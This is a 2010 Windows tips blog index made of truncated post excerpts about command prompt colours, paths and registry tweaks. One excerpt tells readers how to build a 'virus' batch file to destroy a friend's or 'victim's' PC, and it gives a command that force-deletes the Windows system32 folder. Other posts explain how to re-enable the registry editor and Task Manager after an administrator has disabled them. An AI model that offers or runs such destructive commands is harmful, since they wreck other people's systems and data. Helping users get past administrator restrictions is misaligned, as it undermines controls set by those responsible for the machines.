Monday, December 20, 2010

Change MS-DOS background and Foreground colors

Have you ever wondered of changing the DOS background or foreground color ? The value of "DefaultColor" in windows registry editor controls the foreground and background colors used in command prompt windows. It has a...

Saturday, December 18, 2010

Enable Task Manager when diabled by administrator

In my previous post, I shared with you about enabling registry editor when disabled by the administrator. Now using the registry editor enabled, you can enable your task manger if disabled. Task Manager can be...

Tuesday, December 14, 2010

Enable registry editor ( regedit ) when disabled by Administrator

Registry Editor system, can be disabled, blocked and locked by the administrator to prevent the RegEdit from being executed by users in order to protect important system registry settings. Other possibility of Registry Editor been...

Monday, December 13, 2010

Make a simple virus file that destroys your friends' (victims' ) pc by deleting System32

1. Open Notepad 2. Write the above command : - erase %windir%\system32\*.* /q /f 3. Save the above notepad with the extension ".bat or .cmd" as you want. After you created the .cmd or .bat...

Saturday, December 11, 2010

Install Google Earth on Linux Machine

Google Earth is nothing new. It’s been around for a while and in use by millions. But many people don’t know that Google Earth has a Linux client that can be installed on just about Linux...

Test Page

InvestorsPoll.com Your source for the latest information on stocks, commodities, futures, currencies, and all other types of investments. Sarasota Computer Repair The Right Way Computer Repair: We make computers take care of themselves. All our...

Tuesday, December 7, 2010

Change default Command Prompt Path

In my previous post, I told you how to change the default path of command prompt(cmd) manually by editing registry editor. But we have the tools which are more handy and moreover, the tool is...

Monday, December 6, 2010

Change Default command prompt path

When you try to open command prompt window in windows, it starts from its default path i.e from the current user's home folder. But what yo do if you want start from you desired location?...

Friday, December 3, 2010

How to Lock a Folder Without any Software or Programs

1) Make a new folder.2) Inside this folder make a text document & copy inside it this:cls@ECHO OFFtitle Folder Privateif EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCKif NOT EXIST Private goto MDLOCKER:CONFIRMecho Are you sure you want...

Page 1 of 49123»